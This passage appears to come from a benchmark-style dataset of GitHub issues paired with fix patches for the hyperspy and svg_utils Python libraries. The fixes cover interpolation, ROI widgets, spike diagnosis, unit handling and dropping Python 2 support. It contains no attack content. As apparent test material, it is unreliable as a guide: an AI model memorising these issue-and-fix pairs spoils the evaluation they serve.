-
def create_interpolation_line(self):
self.interpolated_line = drawing.signal1d.Signal1DLine()
self.interpolated_line.data_function = self.get_interpolated_spectrum
diff --git a/upcoming_changes/3233.maintenance.rst b/upcoming_changes/3233.maintenance.rst
new file mode 100644
index 0000000000..fd522f2c87
--- /dev/null
+++ b/upcoming_changes/3233.maintenance.rst
@@ -0,0 +1,1 @@
+Replace deprecated :py:class:`scipy.interpolate.interp1d` with :py:func:`scipy.interpolate.make_interp_spline`
| scipy.interp1d legacy
`interp1d` is a legacy function in SciPy that will be deprecated in the future: https://docs.scipy.org/doc/scipy/tutorial/interpolate/1D.html#legacy-interface-for-1-d-interpolation-interp1d
It is currently used 6 times in the codebase: (3 in hs, 1 in rsciio, 2 in eels): https://github.com/search?q=repo%3Ahyperspy%2Fhyperspy%20interp1d&type=code
In view of the legacy nature, it would make sense to use the HyperSpy 2.0 release to actually replace all uses of `interp1d`, as the kwargs might be slightly different and thus it is an API break.
In #3214 `scipy.interpolate.make_interp_spline` is used instead, which has similar behavior to `interp1d` and is probably suitable for most other occurrences.
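A porting note for the call sites above: `interp1d`'s string `kind` argument corresponds to an integer B-spline degree `k` in `make_interp_spline` (and the `bounds_error`/`fill_value` kwargs have no direct equivalent, as the `ScalableFixedPattern` hunk shows). A hypothetical helper sketching that mapping — the helper name is illustrative, not part of either API:

```python
# Map interp1d's spline-like `kind` values to the integer degree `k`
# expected by scipy.interpolate.make_interp_spline.
_KIND_TO_DEGREE = {
    "linear": 1,
    "slinear": 1,
    "quadratic": 2,
    "cubic": 3,
}

def kind_to_k(kind):
    """Translate an interp1d `kind` (str or int) into a spline degree `k`."""
    if isinstance(kind, int):  # interp1d also accepted an integer order
        return kind
    try:
        return _KIND_TO_DEGREE[kind]
    except KeyError:
        raise ValueError(f"no direct make_interp_spline equivalent for kind={kind!r}")
```

Values like `'nearest'` or `'zero'` are deliberately left out, since a B-spline of some degree is not an exact replacement for their step-like semantics.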
| 2023-09-25T17:06:11 | 0.0 | [] | [] |
|||
hyperspy/hyperspy | hyperspy__hyperspy-3222 | 24d9a39297624f18578da57e0dfdae783c85cc17 | diff --git a/hyperspy/drawing/widget.py b/hyperspy/drawing/widget.py
index d23643641e..d3e92e1ec8 100644
--- a/hyperspy/drawing/widget.py
+++ b/hyperspy/drawing/widget.py
@@ -323,7 +323,7 @@ class DraggableWidgetBase(WidgetBase):
def __init__(self, axes_manager, **kwargs):
super(DraggableWidgetBase, self).__init__(axes_manager, **kwargs)
- self.is_pointer=False
+ self.is_pointer = False
self.events.moved = Event(doc="""
Event that triggers when the widget was moved.
@@ -831,7 +831,7 @@ def _update_patch_geometry(self):
self.draw_patch()
-class ResizersMixin(object):
+class ResizersMixin:
"""
Widget mix-in for adding resizing manipulation handles.
@@ -901,7 +901,9 @@ def _set_resizers(self, value, ax):
r.set_animated(self.blit)
else:
for r in self._resizer_handles:
- r.remove()
+ # check that the matplotlib patch is present before removing it
+ if r in ax.get_children():
+ r.remove()
self._resizers_on = value
def _get_resizer_size(self):
@@ -977,7 +979,8 @@ def set_on(self, value):
super(ResizersMixin, self).set_on(value)
def onpick(self, event):
- """Picking of main patch is same as for widget base, but this also
+ """
+ Picking of main patch is same as for widget base, but this also
handles picking of the resize handles. If a resize handle is picked,
`picked` is set to `True`, and `resizer_picked` is set to an integer
indicating which handle was picked (0-3 for top left, top right, bottom
@@ -1009,7 +1012,7 @@ def _add_patch_to(self, ax):
"""Same as widget base, but also adds resizers if 'resizers' property
is True.
"""
- if self.resizers:
+ if self.resizers and self._resizers_on:
self._set_resizers(True, ax)
if hasattr(super(ResizersMixin, self), '_add_patch_to'):
super(ResizersMixin, self)._add_patch_to(ax)
diff --git a/upcoming_changes/3222.bugfix.rst b/upcoming_changes/3222.bugfix.rst
new file mode 100644
index 0000000000..10971c3d68
--- /dev/null
+++ b/upcoming_changes/3222.bugfix.rst
@@ -0,0 +1,1 @@
+Fix harmless error message when using multiple RectangleROI: check if resizer patches are drawn before removing them. Don't display resizers when adding the widget to the figure (widget in unselected state) for consistency with unselected state
| Error messages when using 2 RectangularROI.
#### Describe the bug
An error message shows up when using two RectangularROI. The two RectangularROI still work as intended, though.
#### To Reproduce
The error message shows up when:
- Change RectangularROI size.
- Move RectangularROI.
- Double clicks on RectangularROI.
```
# minimal example
%matplotlib qt
import numpy as np
import matplotlib.pyplot as plt
import hyperspy.api as hs
s = hs.signals.Signal1D(np.random.random((20, 20, 30)))
xx2, yy2, xx1, yy1 = 0, 0, 2, 2
shiftx = 5
shifty = 3
rect_roi0 = hs.roi.RectangularROI(xx2, yy2, xx1, yy1) # x1, y1, x2, y2
rect_roi1 = hs.roi.RectangularROI(xx2 + shiftx , yy2 + shifty, xx1 + shiftx, yy1 + shifty)
s.plot()
color = ["tab:blue", "tab:orange"]
roi0 = rect_roi0.interactive(s, color=color[0])
roi1 = rect_roi1.interactive(s, color=color[1])
```
#### Expected behavior
Error message not showing.
| 2023-09-01T19:54:01 | 0.0 | [] | [] |
|||
hyperspy/hyperspy | hyperspy__hyperspy-3005 | 2db65365c88da07d380e84bd20c42928ce61e207 | diff --git a/hyperspy/_signals/signal1d.py b/hyperspy/_signals/signal1d.py
index d838363640..4abbd13fd5 100644
--- a/hyperspy/_signals/signal1d.py
+++ b/hyperspy/_signals/signal1d.py
@@ -16,11 +16,11 @@
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <https://www.gnu.org/licenses/#GPL>.
-import os
import logging
import math
+import os
+import warnings
-import matplotlib.pyplot as plt
import numpy as np
import dask.array as da
from scipy import interpolate
@@ -29,7 +29,8 @@
from hyperspy.signal import BaseSignal
from hyperspy._signals.common_signal1d import CommonSignal1D
-from hyperspy.signal_tools import SpikesRemoval, SpikesRemovalInteractive
+from hyperspy.signal_tools import (
+ SpikesRemoval, SpikesRemovalInteractive, SimpleMessage)
from hyperspy.models.model1d import Model1D
from hyperspy.misc.lowess_smooth import lowess
from hyperspy.misc.utils import is_binned # remove in v2.0
@@ -270,9 +271,15 @@ def __init__(self, *args, **kwargs):
raise ValueError("Signal1D can't be ragged.")
super().__init__(*args, **kwargs)
- def _get_spikes_diagnosis_histogram_data(self, signal_mask=None,
- navigation_mask=None,
- **kwargs):
+ def _spikes_diagnosis(
+ self,
+ signal_mask=None,
+ navigation_mask=None,
+ show_plot=False,
+ use_gui=False,
+ **kwargs
+ ):
+
self._check_signal_dimension_equals_one()
dc = self.data
axis = self.axes_manager.signal_axes[0].axis
@@ -281,22 +288,41 @@ def _get_spikes_diagnosis_histogram_data(self, signal_mask=None,
axis = axis[~signal_mask]
if navigation_mask is not None:
dc = dc[~navigation_mask, :]
+ if dc.size == 0:
+ raise ValueError("The data size must be higher than 0.")
der = abs(np.gradient(dc, axis, axis=-1))
n = ((~navigation_mask).sum() if navigation_mask else
self.axes_manager.navigation_size)
# arbitrary cutoff for number of spectra necessary before histogram
# data is compressed by finding maxima of each spectrum
- tmp = BaseSignal(der) if n < 2000 else BaseSignal(
- np.ravel(der.max(-1)))
+ tmp = BaseSignal(der) if n < 2000 else BaseSignal(np.ravel(der.max(-1)))
+
+ s_ = tmp.get_histogram(**kwargs)
+ s_.axes_manager[0].name = "Derivative magnitude"
+ s_.metadata.Signal.quantity = "Counts"
+ s_.metadata.General.title = "Spikes Analysis"
+
+ if s_.data.size == 1:
+ message = "The derivative of the data is constant."
+ if use_gui:
+ m = SimpleMessage(text=message)
+ try:
+ m.gui()
+ except (NotImplementedError, ImportError):
+ # This is only available for traitsui, in case of ipywidgets
+ # we show a warning
+ warnings.warn(message)
+ else:
+ warnings.warn(message)
+ elif show_plot:
+ s_.plot(norm="log")
- # get histogram signal using smart binning and plot
- return tmp.get_histogram(**kwargs)
+ return s_
- def spikes_diagnosis(self, signal_mask=None,
- navigation_mask=None,
- **kwargs):
- """Plots a histogram to help in choosing the threshold for
+ def spikes_diagnosis(self, signal_mask=None, navigation_mask=None, **kwargs):
+ """
+ Plots a histogram to help in choosing the threshold for
spikes removal.
Parameters
@@ -312,27 +338,13 @@ def spikes_diagnosis(self, signal_mask=None,
spikes_removal_tool
"""
- tmph = self._get_spikes_diagnosis_histogram_data(signal_mask,
- navigation_mask,
- **kwargs)
- tmph.plot()
-
- # Customize plot appearance
- plt.gca().set_title('')
- plt.gca().fill_between(tmph.axes_manager[0].axis,
- tmph.data,
- facecolor='#fddbc7',
- interpolate=True,
- color='none')
- ax = tmph._plot.signal_plot.ax
- axl = tmph._plot.signal_plot.ax_lines[0]
- axl.set_line_properties(color='#b2182b')
- plt.xlabel('Derivative magnitude')
- plt.ylabel('Log(Counts)')
- ax.set_yscale('log')
- ax.set_ylim(10 ** -1, plt.ylim()[1])
- ax.set_xlim(plt.xlim()[0], 1.1 * plt.xlim()[1])
- plt.draw()
+ self._spikes_diagnosis(
+ signal_mask=signal_mask,
+ navigation_mask=navigation_mask,
+ show_plot=True,
+ use_gui=False,
+ **kwargs
+ )
spikes_diagnosis.__doc__ %= (SIGNAL_MASK_ARG, NAVIGATION_MASK_ARG)
diff --git a/hyperspy/signal_tools.py b/hyperspy/signal_tools.py
index 30b1b47145..c72e847854 100644
--- a/hyperspy/signal_tools.py
+++ b/hyperspy/signal_tools.py
@@ -1757,10 +1757,13 @@ def __init__(self, signal, navigation_mask=None, signal_mask=None,
signal.axes_manager.indices = self.coordinates[0]
if threshold == 'auto':
# Find the first zero of the spikes diagnosis plot
- hist = signal._get_spikes_diagnosis_histogram_data(
+ hist = signal._spikes_diagnosis(
signal_mask=signal_mask,
navigation_mask=navigation_mask,
- max_num_bins=max_num_bins)
+ max_num_bins=max_num_bins,
+ show_plot=False,
+ use_gui=False,
+ )
zero_index = np.where(hist.data == 0)[0]
if zero_index.shape[0] > 0:
index = zero_index[0]
@@ -1950,9 +1953,13 @@ def _click_to_show_instructions_fired(self):
title="Instructions"),
def _show_derivative_histogram_fired(self):
- self.signal.spikes_diagnosis(signal_mask=self.signal_mask,
- navigation_mask=self.navigation_mask,
- max_num_bins=self.max_num_bins)
+ self.signal._spikes_diagnosis(
+ signal_mask=self.signal_mask,
+ navigation_mask=self.navigation_mask,
+ max_num_bins=self.max_num_bins,
+ show_plot=True,
+ use_gui=True,
+ )
def _reset_line(self):
if self.interpolated_line is not None:
diff --git a/upcoming_changes/3005.bugfix.rst b/upcoming_changes/3005.bugfix.rst
new file mode 100644
index 0000000000..644d4b500a
--- /dev/null
+++ b/upcoming_changes/3005.bugfix.rst
@@ -0,0 +1,1 @@
+Fix handling constant derivative in :py:meth:`~._signals.signal1D.Signal1D.spikes_removal_tool`
\ No newline at end of file
| AttributeError on spikes_removal_tool() when using "show derivative histogram"
#### Describe the bug
"show derivative histogram" in the "spikes_removal_tool()" causes AttributeError for the EELSSpectrum and Signal1D objects created by "hs.signals.EELSSpectrum()" and "hs.signals.Signal1D()". But, it works well for the data loaded by "hs.load()".
#### To Reproduce
Steps to reproduce the behavior:
```
%matplotlib qt
import hyperspy.api as hs
```
This is the example in Signal1D Tools in the User guide.
```
s = hs.signals.Signal1D(np.arange(5*10*20).reshape((5, 10, 20)))
s.isig[8:17].spikes_removal_tool()
```
This causes the AttributeError below. When executed, the "Spikes removal tool" window pops up fine, but when the "Show derivative histogram" button is clicked, the error happens. This always happens for any object created by "hs.signals.EELSSpectrum()" and "hs.signals.Signal1D()".
```
AttributeError Traceback (most recent call last)
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy_gui_ipywidgets\tools.py:802, in spikes_removal_ipy.<locals>.on_show_diff_clicked(b)
801 def on_show_diff_clicked(b):
--> 802 obj._show_derivative_histogram_fired()
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy\signal_tools.py:1953, in SpikesRemovalInteractive._show_derivative_histogram_fired(self)
1952 def _show_derivative_histogram_fired(self):
-> 1953 self.signal.spikes_diagnosis(signal_mask=self.signal_mask,
1954 navigation_mask=self.navigation_mask,
1955 max_num_bins=self.max_num_bins)
File ~\anaconda3\envs\Hyperspy\lib\site-packages\hyperspy\_signals\signal1d.py:327, in Signal1D.spikes_diagnosis(self, signal_mask, navigation_mask, **kwargs)
321 plt.gca().set_title('')
322 plt.gca().fill_between(tmph.axes_manager[0].axis,
323 tmph.data,
324 facecolor='#fddbc7',
325 interpolate=True,
326 color='none')
--> 327 ax = tmph._plot.signal_plot.ax
328 axl = tmph._plot.signal_plot.ax_lines[0]
329 axl.set_line_properties(color='#b2182b')
AttributeError: 'NoneType' object has no attribute 'signal_plot'
```
Interestingly, this error does not happen for real experimental data loaded by "hs.load()"; "Show derivative histogram" works well there.
```
s = hs.load('01_EELS_Ref_core loss_aligned.dm4')
s.spikes_removal_tool()
```
#### Expected behavior
It was expected that "Show derivative histogram" would work and show the histogram when clicking the button.
#### Python environment:
- HyperSpy version: 1.7.1
- Python version: 3.8.5
| 2022-08-31T18:40:47 | 0.0 | [] | [] |
|||
btel/svg_utils | btel__svg_utils-104 | 4abf7fb18cea0da04b6b2a0bcacbec5daded1662 | diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 15831e0..73321ce 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/psf/black
- rev: 20.8b1
+ rev: 22.8.0
hooks:
- id: black
language_version: python3
diff --git a/src/svgutils/common.py b/src/svgutils/common.py
new file mode 100644
index 0000000..9928d72
--- /dev/null
+++ b/src/svgutils/common.py
@@ -0,0 +1,59 @@
+import re
+
+
+class Unit:
+ """Implementation of SVG units and conversions between them.
+
+ Parameters
+ ----------
+ measure : str
+ value with unit (for example, '2cm')
+ """
+
+ per_inch = {"px": 90, "cm": 2.54, "mm": 25.4, "pt": 72.0}
+
+ def __init__(self, measure):
+ try:
+ self.value = float(measure)
+ self.unit = "px"
+ except ValueError:
+ m = re.match("([0-9]+\.?[0-9]*)([a-z]+)", measure)
+ value, unit = m.groups()
+ self.value = float(value)
+ self.unit = unit
+
+ def to(self, unit):
+ """Convert to a given unit.
+
+ Parameters
+ ----------
+ unit : str
+ Name of the unit to convert to.
+
+ Returns
+ -------
+ u : Unit
+ new Unit object with the requested unit and computed value.
+ """
+ u = Unit("0cm")
+ u.value = self.value / self.per_inch[self.unit] * self.per_inch[unit]
+ u.unit = unit
+ return u
+
+ def __str__(self):
+ return "{}{}".format(self.value, self.unit)
+
+ def __repr__(self):
+ return "Unit({})".format(str(self))
+
+ def __mul__(self, number):
+ u = Unit("0cm")
+ u.value = self.value * number
+ u.unit = self.unit
+ return u
+
+ def __truediv__(self, number):
+ return self * (1.0 / number)
+
+ def __div__(self, number):
+ return self * (1.0 / number)
diff --git a/src/svgutils/compose.py b/src/svgutils/compose.py
index 8a30a3b..0932fe5 100644
--- a/src/svgutils/compose.py
+++ b/src/svgutils/compose.py
@@ -15,9 +15,9 @@
"""
import os
-import re
from svgutils import transform as _transform
+from svgutils.common import Unit
CONFIG = {
"svg.file_path": ".",
@@ -358,61 +358,3 @@ def tile(self, ncols, nrows):
if iy > nrows:
break
return self
-
-
-class Unit:
- """Implementation of SVG units and conversions between them.
-
- Parameters
- ----------
- measure : str
- value with unit (for example, '2cm')
- """
-
- per_inch = {"px": 90, "cm": 2.54, "mm": 25.4, "pt": 72.0}
-
- def __init__(self, measure):
- try:
- self.value = float(measure)
- self.unit = "px"
- except ValueError:
- m = re.match("([0-9]+\.?[0-9]*)([a-z]+)", measure)
- value, unit = m.groups()
- self.value = float(value)
- self.unit = unit
-
- def to(self, unit):
- """Convert to a given unit.
-
- Parameters
- ----------
- unit : str
- Name of the unit to convert to.
-
- Returns
- -------
- u : Unit
- new Unit object with the requested unit and computed value.
- """
- u = Unit("0cm")
- u.value = self.value / self.per_inch[self.unit] * self.per_inch[unit]
- u.unit = unit
- return u
-
- def __str__(self):
- return "{}{}".format(self.value, self.unit)
-
- def __repr__(self):
- return "Unit({})".format(str(self))
-
- def __mul__(self, number):
- u = Unit("0cm")
- u.value = self.value * number
- u.unit = self.unit
- return u
-
- def __truediv__(self, number):
- return self * (1.0 / number)
-
- def __div__(self, number):
- return self * (1.0 / number)
diff --git a/src/svgutils/transform.py b/src/svgutils/transform.py
index ef15f9e..5cddfa3 100644
--- a/src/svgutils/transform.py
+++ b/src/svgutils/transform.py
@@ -7,6 +7,8 @@
except ImportError:
from io import StringIO
+from svgutils.common import Unit
+
SVG_NAMESPACE = "http://www.w3.org/2000/svg"
XLINK_NAMESPACE = "http://www.w3.org/1999/xlink"
SVG = "{%s}" % SVG_NAMESPACE
@@ -239,17 +241,10 @@ def __init__(self, width=None, height=None):
self._height = 0
if width:
- try:
- self.width = width # this goes to @width.setter a few lines down
- except AttributeError:
- # int or str
- self._width = width
+ self.width = width # this goes to @width.setter a few lines down
if height:
- try:
- self.height = height # this goes to @height.setter a few lines down
- except AttributeError:
- self._height = height
+ self.height = height # this goes to @height.setter a few lines down
@property
def width(self):
@@ -258,6 +253,8 @@ def width(self):
@width.setter
def width(self, value):
+ if not isinstance(value, Unit):
+ value = Unit(value)
self._width = value.value
self.root.set("width", str(value))
self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
@@ -269,6 +266,8 @@ def height(self):
@height.setter
def height(self, value):
+ if not isinstance(value, Unit):
+ value = Unit(value)
self._height = value.value
self.root.set("height", str(value))
self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
| SVGFigure does not set width and height element if created directly
Width and height aren't correctly set in the XML if `transform.SVGFigure` is created directly:
```python
import svgutils
svgutils.transform.SVGFigure("10cm", "16cm").to_str()
```
prints
```python
b'<?xml version=\'1.0\' encoding=\'ASCII\' standalone=\'yes\'?>\n<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"/>\n'
```
This code is used in the tutorial:
https://github.com/btel/svg_utils/blob/4abf7fb18cea0da04b6b2a0bcacbec5daded1662/docs/source/tutorials/scripts/fig_final.py#L5
Therefore I expect that this is not an intended behavior.
| Hi @akhmerov, which version (or Git commit) of svgutils is this about?
I observed this both on 0.3.4 and master (4abf7fb)
Same here, but it works when I take one of the formats from the tests:
```python
import svgutils.transform as sg
from svgutils.compose import Unit
ovWdth = Unit('1080px')
ovHght = Unit('768px')
fig = sg.SVGFigure(ovWdth,ovHght)
```
I think the problem is here, in transform.py lines 259 and 271: `value.value`.
It works when the value uses `Unit()`, but not when an int or string is passed:
```python
@width.setter
def width(self, value):
    self._width = value.value  # fails for plain int/str values
    self.root.set("width", str(value))
    self.root.set("viewBox", "0 0 %s %s" % (self._width, self._height))
```
Indeed, we don't set the SVG tag attributes when width or height is an integer/string.
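For reference, a condensed standalone sketch of the coercion the patch adds in the `width`/`height` setters, reusing the regex from the library's own `Unit` class shown in the diff (this is a trimmed illustration, not the full implementation):

```python
import re

class Unit:
    """Minimal version of svgutils' Unit, just enough for the coercion."""
    def __init__(self, measure):
        try:
            self.value = float(measure)
            self.unit = "px"  # bare numbers default to pixels
        except (TypeError, ValueError):
            value, unit = re.match(r"([0-9]+\.?[0-9]*)([a-z]+)", measure).groups()
            self.value = float(value)
            self.unit = unit

    def __str__(self):
        return f"{self.value}{self.unit}"

class SVGFigure:
    @property
    def width(self):
        return self._width

    @width.setter
    def width(self, value):
        if not isinstance(value, Unit):  # the fix: accept str/int as well
            value = Unit(value)
        self._width = value.value
        self._width_attr = str(value)  # stand-in for root.set("width", ...)

fig_cm = SVGFigure()
fig_cm.width = "10cm"
fig_px = SVGFigure()
fig_px.width = 400
```

With the coercion in place, `SVGFigure("10cm", "16cm")` and `SVGFigure(Unit("10cm"), ...)` go through the same code path, so the `width`/`height`/`viewBox` attributes always end up in the XML.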
||
btel/svg_utils | btel__svg_utils-67 | 0408398b72aaf5df82c483a1ce5b74d5d1cd6854 | diff --git a/.github/workflows/black.yml b/.github/workflows/black.yml
index 7a9bd04..2cf8799 100644
--- a/.github/workflows/black.yml
+++ b/.github/workflows/black.yml
@@ -9,3 +9,5 @@ jobs:
- uses: actions/[email protected]
- uses: actions/[email protected]
- uses: psf/[email protected]
+ env:
+ INPUT_BLACK_ARGS: --target-version py36
diff --git a/.github/workflows/python-publish.yml b/.github/workflows/python-publish.yml
index e38c6a2..9e20097 100644
--- a/.github/workflows/python-publish.yml
+++ b/.github/workflows/python-publish.yml
@@ -20,12 +20,12 @@ jobs:
python-version: '3.x'
- name: Install dependencies
run: |
- python -m pip install --upgrade pip
- pip install setuptools wheel twine
+ python3 -m pip install --upgrade pip
+ pip3 install setuptools wheel twine
- name: Build and publish
env:
TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
run: |
- python setup.py sdist bdist_wheel
+ python3 setup.py sdist bdist_wheel
twine upload dist/*
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index ad879de..5867440 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -3,4 +3,5 @@ repos:
rev: 20.8b1
hooks:
- id: black
- language_version: python3
+ language_version: python3
+ args: ['--target-version', 'py36']
diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst
index a31a0f4..3cfe5c5 100644
--- a/CONTRIBUTING.rst
+++ b/CONTRIBUTING.rst
@@ -18,7 +18,7 @@ This project uses [black](https://github.com/psf/black) for automatically format
You can run the check and formatting hooks using pre-commit:
```
-pip install pre-commit
+pip3 install pre-commit
pre-commit run --all
```
diff --git a/README.rst b/README.rst
index 4c8b391..d80b6a6 100644
--- a/README.rst
+++ b/README.rst
@@ -23,11 +23,11 @@ Install
From PyPI
`````````
-You can install `svgutils` from Python Package Index (PyPI) using the `pip` utility::
+You can install `svgutils` from Python Package Index (PyPI) using the `pip3` utility::
- pip install svgutils --user
+ pip3 install svgutils --user
-Note that the `pip` will attempt to install `lxml` library if it is not already installed.
+Note that the `pip3` will attempt to install `lxml` library if it is not already installed.
For the installation to be sucessful, you need development libraries of `libxml2` and `libxslt1`.
On Ubuntu and other Debian-derived Linux distributions you can install them via::
@@ -52,12 +52,12 @@ From sources
To install system-wide (needs administrator privilages)::
- python setup.py install
+ python3 setup.py install
To install locally (do not forget to add
-``$HOME/python/lib/python2.6/site-packages/`` to your Python path)::
+``$HOME/python/lib/python3.6/site-packages/`` to your Python path)::
- python setup.py install --user
+ python3 setup.py install --user
License
-------
diff --git a/docs/source/getting_started.rst b/docs/source/getting_started.rst
index 505e415..099ac9d 100644
--- a/docs/source/getting_started.rst
+++ b/docs/source/getting_started.rst
@@ -10,11 +10,11 @@ Install
From PyPI
`````````
-You can install `svgutils` from Python Package Index (PyPI) using the `pip` utility::
+You can install `svgutils` from Python Package Index (PyPI) using the `pip3` utility::
- pip install svgutils --user
+ pip3 install svgutils --user
-Note that the `pip` will attempt to install `lxml` library if it is not already installed.
+Note that the `pip3` will attempt to install `lxml` library if it is not already installed.
For the installation to be sucessful, you need development libraries of `libxml2` and `libxslt1`.
On Ubuntu and other Debian-derived Linux distributions you can install them via::
@@ -39,9 +39,9 @@ From sources
To install system-wide (needs administrator privilages)::
- python setup.py install
+ python3 setup.py install
To install locally (do not forget to add
-``$HOME/python/lib/python2.6/site-packages/`` to your Python path)::
+``$HOME/python/lib/python3.6/site-packages/`` to your Python path)::
- python setup.py install --user
+ python3 setup.py install --user
diff --git a/docs/source/tutorials/figures/Makefile b/docs/source/tutorials/figures/Makefile
index 108af65..655eaad 100644
--- a/docs/source/tutorials/figures/Makefile
+++ b/docs/source/tutorials/figures/Makefile
@@ -1,5 +1,5 @@
all:
- python ../scripts/anscombe.py
- python ../scripts/sigmoid_fit.py
- python ../scripts/fig_final.py
- python ../scripts/fig_compose.py
+ python3 ../scripts/anscombe.py
+ python3 ../scripts/sigmoid_fit.py
+ python3 ../scripts/fig_final.py
+ python3 ../scripts/fig_compose.py
diff --git a/docs/source/tutorials/scripts/anscombe.py b/docs/source/tutorials/scripts/anscombe.py
index 1d87871..ba9aca0 100644
--- a/docs/source/tutorials/scripts/anscombe.py
+++ b/docs/source/tutorials/scripts/anscombe.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
"""
Edward Tufte uses this example from Anscombe to show 4 datasets of x
diff --git a/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py b/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
index 1afe056..d4fc1a0 100644
--- a/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
+++ b/docs/source/tutorials/scripts/composing_multipanel_figures_examples.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/docs/source/tutorials/scripts/fig_compose.py b/docs/source/tutorials/scripts/fig_compose.py
index 2a711ff..cbb3705 100644
--- a/docs/source/tutorials/scripts/fig_compose.py
+++ b/docs/source/tutorials/scripts/fig_compose.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/examples/compose_example.py b/examples/compose_example.py
index 7cd22e3..de4c80e 100644
--- a/examples/compose_example.py
+++ b/examples/compose_example.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.compose import *
diff --git a/examples/stack_plots.py b/examples/stack_plots.py
index 8b0552c..5f73e7b 100644
--- a/examples/stack_plots.py
+++ b/examples/stack_plots.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
import numpy as np
diff --git a/examples/stack_svg.py b/examples/stack_svg.py
index af97f63..09dcaba 100644
--- a/examples/stack_svg.py
+++ b/examples/stack_svg.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.transform import fromfile
diff --git a/setup.py b/setup.py
index 3e31e66..d2c2f5a 100644
--- a/setup.py
+++ b/setup.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from setuptools import setup
@@ -24,19 +24,18 @@
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
+ "Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.6",
- "Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3",
- "Programming Language :: Python :: 2.7",
- "Programming Language :: Python :: 2",
"Topic :: Multimedia :: Graphics :: Editors :: Vector-Based",
"Topic :: Scientific/Engineering :: Visualization",
"Topic :: Text Processing :: Markup",
],
package_dir={"": "src"},
+ python_requires=">=3.6",
install_requires=["lxml"],
download_url="https://github.com/btel/svg_utils/archive/v{}.tar.gz".format(
version_str
diff --git a/src/svgutils/compose.py b/src/svgutils/compose.py
index 5aa6486..8a30a3b 100644
--- a/src/svgutils/compose.py
+++ b/src/svgutils/compose.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
"""SVG definitions designed for easy SVG composing
diff --git a/src/svgutils/templates.py b/src/svgutils/templates.py
index d34a51c..e20c08d 100644
--- a/src/svgutils/templates.py
+++ b/src/svgutils/templates.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
# coding=utf-8
from svgutils.transform import SVGFigure, GroupElement
| Plans for dropping support for end-of-life Python 2.7 and 3.5?
Hi!
The oldest version of Python that has *not* [reached end of life](https://endoflife.date/python) as of today is Python 3.6. The svgutils code base currently supports 2.7 and 3.5 officially and in practice. I have seen people express vastly different opinions before on which versions of Python a project should support in 2021. So I would just like to hear what the current plan or approach to end-of-life Python is, and then see how and whether I can help.
A benefit of dropping support for old versions, is that we could e.g. start using [f-strings](https://www.python.org/dev/peps/pep-0498/) and [type hints](https://docs.python.org/3/library/typing.html) in this code base if we wanted, in general.
Best, Sebastian
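The f-strings and type hints mentioned as benefits are both Python 3.6+ features; a small illustrative sketch (not svgutils code) of what they enable:

```python
def label(width: float, unit: str = "px") -> str:
    # f-string (3.6+) interpolates expressions directly into the literal
    return f"{width:.1f}{unit}"

# type hints document intent for tools like mypy without changing runtime behavior
sizes: list = [10, 20.5]
labels = [label(s) for s in sizes]
```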
| sure, I am fine with dropping Python 2.x or even <=3.5 in 0.4.0. Especially if some features of >3.5 will be useful in the code base.
Okay, I'll prepare a pull request in a minute.
| 2021-02-11T14:04:14 | 0.0 | [] | [] |
||
btel/svg_utils | btel__svg_utils-58 | 3a9a550c76a342c81742552a79c140b67af7e286 | diff --git a/src/svgutils/transform.py b/src/svgutils/transform.py
index 39d129d..384379e 100644
--- a/src/svgutils/transform.py
+++ b/src/svgutils/transform.py
@@ -239,11 +239,17 @@ def __init__(self, width=None, height=None):
self._height = 0
if width:
- self._width = width.value
- self.width = width
+ try:
+ # width is an instance of Unit
+ self._width = width.value
+ except AttributeError:
+ # int or str
+ self._width = width
if height:
- self._height = height.value
- self.height = height
+ try:
+ self._height = height.value
+ except AttributeError:
+ self._height = height
@property
def width(self):
| Unknown expected types for SVGFigure parameters
The recently released 0.3.2 has resulted in the following (truncated) traceback:
```Python
File "/usr/local/miniconda/lib/python3.7/site-packages/niworkflows/viz/utils.py", line 360, in compose_view
fig = SVGFigure(width, heights[:nsvgs].sum())
File "/usr/local/miniconda/lib/python3.7/site-packages/svgutils/transform.py", line 242, in __init__
self._width = width.value
AttributeError: 'numpy.int64' object has no attribute 'value'
```
